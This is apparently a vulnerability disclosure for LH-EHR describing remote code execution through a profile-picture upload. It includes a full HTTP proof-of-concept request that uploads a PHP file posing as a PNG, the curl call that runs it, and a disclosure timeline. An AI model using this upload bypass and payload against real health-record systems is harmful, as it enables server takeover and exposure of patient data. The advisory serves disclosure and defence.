LH-EHR RCE Via Picture Upload
The Issue
Arbitrary file upload vulnerability allowing any user who can set profile pictures to be able to execute code on the hosting system. In lh-ehr, an attacker must be authenticated, and have sufficient privileges to upload a user profile picture (either for a user, or a patient) to perform this attack. It appears any valid user can perform this.
Issue location
POC:
POST /lh-ehr/interface/patient_file/summary/demographics.php?set_pid=153391 HTTP/1.1
Host: 192.168.9.142
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.9.142/lh-ehr/interface/patient_file/summary/demographics.php?set_pid=153391
Content-Type: multipart/form-data; boundary=---------------------------216243089528218
Content-Length: 252
Cookie: LibreHealthEHR=e2hroqj4n8d8odrds55bes4ui2
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------216243089528218
Content-Disposition: form-data; name="profile_picture"; filename="T03KD3TL5-U44DPA2RY-73f7cefa04dd-1000.php"
Content-Type: image/png
<?php echo `id`; ?>
-----------------------------216243089528218--
ubuntu@ubuntu:/var/www/html/lh-ehr/profile_pictures$ curl 127.0.0.1/lh-ehr/profile_pictures/153391.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Disclosure Timeline
- Issue Reported: 11th August 2018
- Issue Resolved:
<TBD> - Blog Post Published: 3rd September 2018